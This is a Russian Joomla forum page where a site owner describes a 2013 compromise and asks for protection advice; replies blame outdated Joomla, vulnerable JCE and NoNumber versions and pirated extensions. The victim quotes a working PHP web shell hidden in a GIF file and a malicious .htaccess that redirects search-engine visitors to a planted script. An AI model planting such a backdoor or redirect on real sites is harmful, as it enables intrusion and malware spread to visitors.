Новости Joomla

Вышли релизы безопасности Joomla 6.1.3 и Joomla 5.4.8

Релиз безопасности Joomla 6.1.3 и Joomla 5.4.8

Проект Joomla! рад сообщить о выходе Joomla 6.1.3 и Joomla 5.4.8. Это релизы безопасности и исправления ошибок для серий 5.x и 6.x.

👩‍💻 WT Otpravkapochtaru - библиотека сервиса Отправка Почты России для Joomla-разработчиков.

👩‍💻 WT Otpravkapochtaru - библиотека сервиса Отправка Почты России для Joomla-разработчиков.

Joomla 5+ пакет для интеграции с API Почты России: нормализация данных, расчёт доставки, создание отправлений, партии, документы, возвраты, поиск отделений, справочники и SOAP-отслеживание.

v.3.0.0. Что нового?
Это дальнейшее развитие ранее закрытой Joomla-библиотеки для работы с API сервиса Отправка (для бизнеса) Почты России. Поэтому версия не 1.0.0, а 3.0.0.

Сейчас эта библиотека ушла от собственных реализаций и стала Joomla-обёрткой известного PHP SDK от Lapay Group.

Возможности библиотеки.
- получение настроек аккаунта, точек сдачи и текущего остатка запросов к API;
- нормализация адресов, ФИО и телефонов перед созданием отправления;
- расчёт тарифа и срока доставки;
- создание, поиск, изменение, удаление и возврат заказов в состояние «Новые»;
- проверка надёжности получателя;
- создание партий, просмотр партий и заказов внутри партии;
- генерация пакета печатных документов и формы Ф103;
- создание, изменение и удаление возвратных отправлений;
- поиск отделений по индексу, адресу и координатам, получение сервисов отделения;
- локальный список стран;
- SOAP-отслеживание операций по РПО и работа с билетами пакетного трекинга.

👩‍💻 Joomla-возможности.
В пакете библиотеки WT Otpravkapochtaru есть поля Joomla Form для расширений. Они позволяют работать в интерфейсе Joomla с некоторыми типами данных, получаемых по API из вашего личного кабинета в ЛК Почты России для бизнеса.
На данный момент в библиотеке доступны 3 поля списков, которые отображают доступные в аккаунте ОПС, типы и категории отправлений.
Поддерживаются зависимые списки: значение одного поля обновляется при изменении другого.

Системные требования.
Системные требования в основном связаны с системными требованиями апстрима библиотеки - LapayGroup PHP SDK.
- Joomla 5+
- PHP 8.3+
- Расширения PHP:
-- ext-mbstring
-- ext-simplexml
-- ext-soap (опционально, для трекинга)
-- ext-zip

Ссылки:
- Страница расширения
- GitHub библиотеки и документация

@joomlafeed

0 Пользователей и 1 Гость просматривают эту тему.
  • 7 Ответов
  • 4626 Просмотров
*

romashkin

  • Осваиваюсь на форуме
  • 34
  • 0 / 0
Всем привет! Сайт на Joomla 1.5, постоянно подвергался следующей атаке.
В папку images заливается gif-файл c кодом
Код
GIF89a1
<?php eval(stripslashes(@$_POST[(chr(112).chr(49))]));?>
Затем в другой произвольной папке создавался php-файл с вирусом и выполнялся. Его я не сохранил..
Полазив по инету нашел подсказку что можно через htaccess сделать так чтобы залитый файл не исполнялся а просто выводился в браузер или давался на скачку при обращении к нему. Проделал данную операцию оданко это не спасло и...

Настал немного черный день, потому что следующая атака оказалась совсем негуманной, в результате которой Google и Яндекс обозвали сайт распространителем вируса и браузеры стали выдавать warning при попытке захода на него.

Атака была похожей только теперь во все каталоги был прописан файл .htaccess следующего содержания
Код
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|yandex|ya|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|linkedin|flickr|filesearch|yell|openstat|metabot|gigablast|entireweb|amfibi|dmoz|yippy|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|infospace|web|websuche|witch|wolong|oekoportal|freenet|arcor|alexana|tiscali|kataweb|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|westaustraliaonline)\.(.*)
RewriteCond %{HTTP_USER_AGENT} ^.*(msie|opera) [NC]
RewriteCond %{REQUEST_FILENAME} !/index_backup.php
RewriteRule (.*) /index_backup.php?query=$1 [QSA,L]
</IfModule>
И соответственно в некоторых директориях появился файл index_backup.php, который я, к сожалению, не сохранил.

В сути проникновения разбираться не стал (скорее всего она была похожей), так как решил поскорее залить чистую версию сайта и убрать ограничения из поисковиков.


Кто что может посоветовать по защите сайта от дальнейших проникновений? И что это было?
И спасет ли переход на свежую версию Joomla! ?

Учитывая, что атаки могли были направлены именно на выбивание сайта из поиска и понижение его позиций в выдаче, возможно ли как-то идентифицировать взломщика? И какие вообще меры можно при успешной идентификации применить?
« Последнее редактирование: 25.05.2013, 21:25:48 от romashkin »
*

AlexSmirnov

  • Завсегдатай
  • 1862
  • 272 / 16
  • Ищите и найдете
Имеются ли/были ли раньше на Вашем веб сайте какие-либо расширения, скачанные с вареза?
# Back the fufalo (особенно ту самую столкершу)! #
# ВАЖНО! Кайфую от удаления присланного в личку спама, почти как от любви (особенно по выходным). #
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Всем привет! Сайт на Joomla 1.5, постоянно подвергается следующей атаке.
В папку images заливается gif-файл c кодом
С чем связаны все последние заражения сайтов
Цитировать
1. Старые версии движка, ну в прочем для многих не открытие. И уж давно пора все обновить до последних актуальных в своей линейке.
2. Редактор JCE - его последнее время залатывали не раз.
3. NoNumber Framework Joomla - все расширения от NoNumber используют свой Framework, в нем была уязвимость, автор залатывал её, потом переход был на платные версии, может ошибаюсь но, сейчас видимо заплатка прохудилась и скорей всего не будет поддержке старой версии. Получается версии 1.* уязвимы
*

romashkin

  • Осваиваюсь на форуме
  • 34
  • 0 / 0
Имеются ли/были ли раньше на Вашем веб сайте какие-либо расширения, скачанные с вареза?
Скорее всего нет, все расширения качал с офсайта Joomla
*

AlexSmirnov

  • Завсегдатай
  • 1862
  • 272 / 16
  • Ищите и найдете
Тему в ссылке стоит принимать как руководство ТОЛЬКО тем, кто

1 НЕ ИМЕЛ/НЕ ИМЕЕТ на своем веб сайте варезных расширений

2 устанавливал:

-  редактор JCE 2.2.4 и версии, выпущенный перед ней
-  кто устанавливал и продолжает работать на "NoNumber Framework", скачанный до 12 апреля 2012 (http://www.nonumber.nl/news/releases/285-security-fixes--all-nonumber-extensions)
# Back the fufalo (особенно ту самую столкершу)! #
# ВАЖНО! Кайфую от удаления присланного в личку спама, почти как от любви (особенно по выходным). #
*

romashkin

  • Осваиваюсь на форуме
  • 34
  • 0 / 0
*

AlexSmirnov

  • Завсегдатай
  • 1862
  • 272 / 16
  • Ищите и найдете
Ммм...

Судя по этому
Цитировать
все расширения качал с офсайта Joomla
я имею основание не верить.

Тем кто читает эту тему:

не занимайтесь чисткой своего взломанного или зараженного веб сайта до тех пор, пока на нем установлены/были установлены варезные расширения - главный источник распространения вирусов и бэкдоров.
« Последнее редактирование: 25.05.2013, 22:22:38 от AlexSmirnov »
# Back the fufalo (особенно ту самую столкершу)! #
# ВАЖНО! Кайфую от удаления присланного в личку спама, почти как от любви (особенно по выходным). #
*

romashkin

  • Осваиваюсь на форуме
  • 34
  • 0 / 0
Ммм...

Судя по этомуя сомневаюсь в Вашей честности.

Тем кто читает эту тему:

не занимайтесь чисткой своего взломанного или зараженного веб сайта до тех пор, пока на нем установлены варезные расширения - главный источник распространения вирусов и бэкдоров.

По моему нет смысла скачивать бесплатные компоненты (free версии)  с варезных сайтов, а заплатить 15 баксов за полезное расширение на мой взгляд не проблема. Сайт очень простенький. Из расширений только фотогалерея.. Имелось ввиду что скачивал по ссылкам на офсайте Joomla..

Есть веские основания полагать, что атака велась целенаправленно на "этот сайт", а не просто на "случайный сайт на Joomla", с целью дискредитации его в поисковых системах.

Что, в принципе, и удалось.

Из того что сделал - поставил на все папки права 0555, на конфиг-файл 0400, index-ы.php 0600 Добавил .htaccess с запретом доступ к файлам php и pl в папке изображений.
« Последнее редактирование: 25.05.2013, 22:04:12 от romashkin »
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Файл конфигурации попытка взлома

Автор Evgenii_web

Ответов: 8
Просмотров: 2042
Последний ответ 09.03.2019, 11:06:54
от wishlight
Попытка взлома сайта или что это?

Автор vad78

Ответов: 12
Просмотров: 2241
Последний ответ 11.06.2018, 13:57:10
от vad78
Бесплатная защита сайта от взлома, парсеров, DDoS и других кибератак

Автор Core System

Ответов: 16
Просмотров: 3902
Последний ответ 09.06.2018, 14:58:54
от Core System
БД после взлома

Автор cntrl

Ответов: 11
Просмотров: 1731
Последний ответ 09.01.2018, 17:06:17
от Aleks.Denezh
[скачать] jHackGuard 1.4.0 - плагин защиты от взлома сайта, SQL инъекций, XSS атак

Автор Sulpher

Ответов: 91
Просмотров: 75570
Последний ответ 14.12.2017, 20:22:52
от karam